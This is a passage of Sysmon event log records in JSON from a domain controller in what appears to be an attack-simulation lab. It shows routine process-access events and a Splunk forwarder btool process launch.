dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3849,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3850,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3851,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3852,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3853,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3854,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3855,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-0010E2A60500}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-0010E2A60500}","TargetProcessId":"4932","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3856,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.519\r\nProcessGuid: {E2A3D6B1-1106-5F25-0000-00109DA70500}\r\nProcessId: 4968\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1106-5F25-0000-0010E2A60500}\r\nParentProcessId: 4932\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.519","ProcessGuid":"{E2A3D6B1-1106-5F25-0000-00109DA70500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1106-5F25-0000-0010E2A60500}","ParentProcessId":"4932","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3857,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-1106-5F25-0000-0010E2A60500}\r\nSourceProcessId: 4932\r\nSourceThreadId: 4936\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00109DA70500}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program 